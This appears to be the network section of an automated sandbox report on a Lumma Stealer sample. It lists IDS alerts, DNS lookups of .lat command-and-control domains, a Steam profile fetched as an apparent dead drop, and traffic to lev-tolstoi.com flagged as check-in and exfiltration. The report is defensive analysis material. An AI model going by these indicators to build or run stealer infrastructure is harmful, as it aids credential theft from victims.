2024-12-23T07:09:17.648936+0100 | 2058364 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat) | 1 | 192.168.2.6 | 58185 | 1.1.1.1 | 53 | UDP
2024-12-23T07:09:17.944613+0100 | 2058360 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (discokeyus .lat) | 1 | 192.168.2.6 | 52798 | 1.1.1.1 | 53 | UDP
2024-12-23T07:09:18.086991+0100 | 2058370 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacebudi .lat) | 1 | 192.168.2.6 | 63137 | 1.1.1.1 | 53 | UDP
2024-12-23T07:09:18.228583+0100 | 2058362 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (energyaffai .lat) | 1 | 192.168.2.6 | 59103 | 1.1.1.1 | 53 | UDP
2024-12-23T07:09:18.373559+0100 | 2058354 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (aspecteirs .lat) | 1 | 192.168.2.6 | 63906 | 1.1.1.1 | 53 | UDP
2024-12-23T07:09:18.514270+0100 | 2058376 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sustainskelet .lat) | 1 | 192.168.2.6 | 52077 | 1.1.1.1 | 53 | UDP
2024-12-23T07:09:18.656111+0100 | 2058358 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crosshuaht .lat) | 1 | 192.168.2.6 | 59967 | 1.1.1.1 | 53 | UDP
2024-12-23T07:09:18.796359+0100 | 2058374 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rapeflowwj .lat) | 1 | 192.168.2.6 | 62827 | 1.1.1.1 | 53 | UDP
2024-12-23T07:09:20.477893+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49707 | 23.55.153.106 | 443 | TCP
2024-12-23T07:09:21.404431+0100 | 2858666 | ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup | 1 | 192.168.2.6 | 49707 | 23.55.153.106 | 443 | TCP
2024-12-23T07:09:22.985523+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49710 | 104.21.66.86 | 443 | TCP
2024-12-23T07:09:23.739006+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.6 | 49710 | 104.21.66.86 | 443 | TCP
2024-12-23T07:09:23.739006+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.6 | 49710 | 104.21.66.86 | 443 | TCP
2024-12-23T07:09:24.985880+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49712 | 104.21.66.86 | 443 | TCP
2024-12-23T07:09:25.764957+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.6 | 49712 | 104.21.66.86 | 443 | TCP
2024-12-23T07:09:25.764957+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.6 | 49712 | 104.21.66.86 | 443 | TCP
2024-12-23T07:09:27.420862+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49718 | 104.21.66.86 | 443 | TCP
2024-12-23T07:09:29.758273+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49724 | 104.21.66.86 | 443 | TCP
2024-12-23T07:09:32.243897+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49730 | 104.21.66.86 | 443 | TCP
2024-12-23T07:09:34.965088+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49740 | 104.21.66.86 | 443 | TCP
2024-12-23T07:09:37.537904+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49747 | 104.21.66.86 | 443 | TCP
2024-12-23T07:09:37.551995+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.6 | 49747 | 104.21.66.86 | 443 | TCP
2024-12-23T07:09:41.398205+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49758 | 104.21.66.86 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 23, 2024 07:09:19.081947088 CET | 49707 | 443 | 192.168.2.6 | 23.55.153.106
Dec 23, 2024 07:09:19.081988096 CET | 443 | 49707 | 23.55.153.106 | 192.168.2.6
Dec 23, 2024 07:09:19.082156897 CET | 49707 | 443 | 192.168.2.6 | 23.55.153.106
Dec 23, 2024 07:09:19.086308956 CET | 49707 | 443 | 192.168.2.6 | 23.55.153.106
Dec 23, 2024 07:09:19.086321115 CET | 443 | 49707 | 23.55.153.106 | 192.168.2.6
Dec 23, 2024 07:09:20.477725029 CET | 443 | 49707 | 23.55.153.106 | 192.168.2.6
Dec 23, 2024 07:09:20.477893114 CET | 49707 | 443 | 192.168.2.6 | 23.55.153.106
Dec 23, 2024 07:09:20.547565937 CET | 49707 | 443 | 192.168.2.6 | 23.55.153.106
Dec 23, 2024 07:09:20.547590971 CET | 443 | 49707 | 23.55.153.106 | 192.168.2.6
Dec 23, 2024 07:09:20.547935963 CET | 443 | 49707 | 23.55.153.106 | 192.168.2.6
Dec 23, 2024 07:09:20.601061106 CET | 49707 | 443 | 192.168.2.6 | 23.55.153.106
Dec 23, 2024 07:09:20.729974985 CET | 49707 | 443 | 192.168.2.6 | 23.55.153.106
Dec 23, 2024 07:09:20.771336079 CET | 443 | 49707 | 23.55.153.106 | 192.168.2.6
Dec 23, 2024 07:09:21.404387951 CET | 443 | 49707 | 23.55.153.106 | 192.168.2.6
Dec 23, 2024 07:09:21.404417038 CET | 443 | 49707 | 23.55.153.106 | 192.168.2.6
Dec 23, 2024 07:09:21.404426098 CET | 443 | 49707 | 23.55.153.106 | 192.168.2.6
Dec 23, 2024 07:09:21.404449940 CET | 443 | 49707 | 23.55.153.106 | 192.168.2.6
Dec 23, 2024 07:09:21.404459953 CET | 49707 | 443 | 192.168.2.6 | 23.55.153.106
Dec 23, 2024 07:09:21.404464960 CET | 443 | 49707 | 23.55.153.106 | 192.168.2.6
Dec 23, 2024 07:09:21.404486895 CET | 443 | 49707 | 23.55.153.106 | 192.168.2.6
Dec 23, 2024 07:09:21.404517889 CET | 49707 | 443 | 192.168.2.6 | 23.55.153.106
Dec 23, 2024 07:09:21.404633999 CET | 49707 | 443 | 192.168.2.6 | 23.55.153.106
Dec 23, 2024 07:09:21.580647945 CET | 443 | 49707 | 23.55.153.106 | 192.168.2.6
Dec 23, 2024 07:09:21.580769062 CET | 443 | 49707 | 23.55.153.106 | 192.168.2.6
Dec 23, 2024 07:09:21.580842018 CET | 49707 | 443 | 192.168.2.6 | 23.55.153.106
Dec 23, 2024 07:09:21.580861092 CET | 443 | 49707 | 23.55.153.106 | 192.168.2.6
Dec 23, 2024 07:09:21.580935001 CET | 49707 | 443 | 192.168.2.6 | 23.55.153.106
Dec 23, 2024 07:09:21.618742943 CET | 443 | 49707 | 23.55.153.106 | 192.168.2.6
Dec 23, 2024 07:09:21.618793964 CET | 443 | 49707 | 23.55.153.106 | 192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:21.618829966 CET4434970723.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:21.618908882 CET49707443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:21.618968010 CET49707443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:21.620933056 CET49707443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:21.620946884 CET4434970723.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:21.620958090 CET49707443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:21.620965004 CET4434970723.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:21.768205881 CET49710443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:21.768316984 CET44349710104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:21.768456936 CET49710443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:21.768825054 CET49710443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:21.768855095 CET44349710104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:22.985419035 CET44349710104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:22.985522985 CET49710443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:22.987227917 CET49710443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:22.987241030 CET44349710104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:22.987515926 CET44349710104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:22.988751888 CET49710443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:22.988771915 CET49710443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:22.988854885 CET44349710104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:23.739046097 CET44349710104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:23.739341974 CET44349710104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:23.739428043 CET49710443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:23.739644051 CET49710443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:23.739694118 CET44349710104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:23.739742041 CET49710443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:23.739758968 CET44349710104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:23.769679070 CET49712443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:23.769736052 CET44349712104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:23.769848108 CET49712443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:23.770235062 CET49712443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:23.770247936 CET44349712104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:24.985745907 CET44349712104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:24.985879898 CET49712443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:24.987258911 CET49712443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:24.987266064 CET44349712104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:24.987566948 CET44349712104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:24.988836050 CET49712443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:24.988864899 CET49712443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:24.988917112 CET44349712104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:25.765037060 CET44349712104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:25.765288115 CET44349712104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:25.765336037 CET49712443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:25.765348911 CET44349712104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:25.765480995 CET44349712104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:25.765542984 CET49712443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:25.765549898 CET44349712104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:25.781424999 CET44349712104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:25.781486988 CET49712443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:25.781496048 CET44349712104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:25.789760113 CET44349712104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:25.789794922 CET44349712104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:25.789818048 CET49712443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:25.789828062 CET44349712104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:25.789880037 CET49712443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:25.884452105 CET44349712104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:25.929265976 CET49712443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:25.929285049 CET44349712104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:25.956609011 CET44349712104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:25.956849098 CET49712443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:25.956859112 CET44349712104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:25.960851908 CET44349712104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:25.960916996 CET49712443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:25.961042881 CET49712443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:25.961050987 CET44349712104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:25.961088896 CET49712443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:25.961097002 CET44349712104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:26.198405027 CET49718443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:26.198455095 CET44349718104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:26.198535919 CET49718443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:26.199079037 CET49718443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:26.199095964 CET44349718104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:27.420732021 CET44349718104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:27.420861959 CET49718443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:27.428394079 CET49718443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:27.428401947 CET44349718104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:27.428647995 CET44349718104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:27.429949999 CET49718443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:27.430094004 CET49718443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:27.430119991 CET44349718104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:28.384623051 CET44349718104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:28.384891987 CET44349718104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:28.385006905 CET49718443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:28.385298967 CET49718443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:28.385318995 CET44349718104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:17.454637051 CET5083653192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:17.593065977 CET53508361.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:17.648936033 CET5818553192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:17.898864031 CET53581851.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:17.944612980 CET5279853192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:18.081825018 CET53527981.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:18.086991072 CET6313753192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:18.224515915 CET53631371.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:18.228583097 CET5910353192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:18.369600058 CET53591031.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:18.373558998 CET6390653192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:18.512569904 CET53639061.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:18.514270067 CET5207753192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:18.651985884 CET53520771.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:18.656111002 CET5996753192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:18.794179916 CET53599671.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:18.796359062 CET6282753192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:18.934283018 CET53628271.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:18.936224937 CET5794953192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:19.072911024 CET53579491.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:21.630225897 CET6391853192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:21.766988039 CET53639181.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:17.454637051 CET192.168.2.61.1.1.10x4177Standard query (0)sweepyribs.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:17.648936033 CET192.168.2.61.1.1.10x6622Standard query (0)grannyejh.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:17.944612980 CET192.168.2.61.1.1.10xb564Standard query (0)discokeyus.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:18.086991072 CET192.168.2.61.1.1.10x4140Standard query (0)necklacebudi.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:18.228583097 CET192.168.2.61.1.1.10xf01bStandard query (0)energyaffai.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:18.373558998 CET192.168.2.61.1.1.10xbe33Standard query (0)aspecteirs.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:18.514270067 CET192.168.2.61.1.1.10xc639Standard query (0)sustainskelet.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:18.656111002 CET192.168.2.61.1.1.10x1f32Standard query (0)crosshuaht.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:18.796359062 CET192.168.2.61.1.1.10x9061Standard query (0)rapeflowwj.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:18.936224937 CET192.168.2.61.1.1.10xd087Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:21.630225897 CET192.168.2.61.1.1.10xf0e0Standard query (0)lev-tolstoi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:17.593065977 CET1.1.1.1192.168.2.60x4177Name error (3)sweepyribs.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:17.898864031 CET1.1.1.1192.168.2.60x6622Name error (3)grannyejh.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:18.081825018 CET1.1.1.1192.168.2.60xb564Name error (3)discokeyus.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:18.224515915 CET1.1.1.1192.168.2.60x4140Name error (3)necklacebudi.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:18.369600058 CET1.1.1.1192.168.2.60xf01bName error (3)energyaffai.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:18.512569904 CET1.1.1.1192.168.2.60xbe33Name error (3)aspecteirs.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:18.651985884 CET1.1.1.1192.168.2.60xc639Name error (3)sustainskelet.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:18.794179916 CET1.1.1.1192.168.2.60x1f32Name error (3)crosshuaht.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:18.934283018 CET1.1.1.1192.168.2.60x9061Name error (3)rapeflowwj.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:19.072911024 CET1.1.1.1192.168.2.60xd087No error (0)steamcommunity.com23.55.153.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:21.766988039 CET1.1.1.1192.168.2.60xf0e0No error (0)lev-tolstoi.com104.21.66.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:21.766988039 CET1.1.1.1192.168.2.60xf0e0No error (0)lev-tolstoi.com172.67.157.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  • steamcommunity.com
                                                                                                                                                                                                                                                                  • lev-tolstoi.com
                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  0192.168.2.64970723.55.153.1064436480C:\Users\user\Desktop\tPSrcPbmRe.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-12-23 06:09:20 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  Host: steamcommunity.com
                                                                                                                                                                                                                                                                  2024-12-23 06:09:21 UTC1905INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                  Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                                                                                                  Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 06:09:21 GMT
                                                                                                                                                                                                                                                                  Content-Length: 35121
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Set-Cookie: sessionid=16848c626f92fe879f895702; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                                                  Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                                  2024-12-23 06:09:21 UTC14479INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e
                                                                                                                                                                                                                                                                  Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
                                                                                                                                                                                                                                                                  2024-12-23 06:09:21 UTC10097INData Raw: 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a 09 09 09 09 53 55 50 50 4f 52 54 09
                                                                                                                                                                                                                                                                  Data Ascii: .com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SUPPORT
